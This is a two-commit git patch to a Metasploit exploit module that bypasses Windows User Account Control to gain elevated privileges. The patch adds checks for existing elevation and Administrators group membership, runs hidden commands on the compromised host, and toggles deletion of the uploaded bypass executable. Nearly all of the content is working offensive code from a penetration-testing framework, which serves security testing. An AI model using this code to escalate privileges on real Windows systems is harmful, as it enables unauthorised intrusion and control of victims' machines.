From 7d41f1f9a05e5b85456be7d62564cd34ac204ffa Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Wed, 14 Nov 2012 23:54:01 -0500 Subject: [PATCH 1/2] add admin already and admin group checks --- modules/exploits/windows/local/bypassuac.rb | 34 +++++++++++++++++++-- 1 file changed, 32 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index a0d30aac47..13f8becb7f 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -50,6 +50,11 @@ class Metasploit3 < Msf::Exploit::Local def exploit + isadmin = session.railgun.shell32.IsUserAnAdmin() + if isadmin['return'] + print_error('Already in elevated state. Exiting...') + return + end # # Verify use against Vista+ @@ -95,6 +100,31 @@ class Metasploit3 < Msf::Exploit::Local return end + # Check if you are an admin + print_status('Checking admin status...') + whoami = session.sys.process.execute('cmd /c whoami /groups', + nil, + {'Hidden' => true, 'Channelized' => true} + ) + cmdout = [] + isinadmins = [] + while(cmdoutput = whoami.channel.read) + cmdout << cmdoutput + end + if cmdout.size == 0 + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/) + if isinadmins.size > 0 + print_good('Part of Administrators group! Continuing...') + else + print_error('Not in admins group, cannot escalate with this module') + print_error('Exiting...') + return + end + end + # # Generate payload and random names for upload # @@ -118,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local end tmpdir = session.fs.file.expand_path("%TEMP%") - cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}" + cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}" print_status("Uploading the bypass UAC executable to the filesystem...") @@ -148,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Local # delete the uac bypass payload delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}" - session.sys.process.execute(delete_file, nil, {'Hidden' => true}) + #session.sys.process.execute(delete_file, nil, {'Hidden' => true}) end end From e18acf21033c9d8fc686bc87fc4fad28a37f811a Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Wed, 14 Nov 2012 23:56:32 -0500 Subject: [PATCH 2/2] remove debugging code --- modules/exploits/windows/local/bypassuac.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 13f8becb7f..8eab936ebf 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local end tmpdir = session.fs.file.expand_path("%TEMP%") - cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}" + cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}" print_status("Uploading the bypass UAC executable to the filesystem...") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Local # delete the uac bypass payload delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}" - #session.sys.process.execute(delete_file, nil, {'Hidden' => true}) + session.sys.process.execute(delete_file, nil, {'Hidden' => true}) end end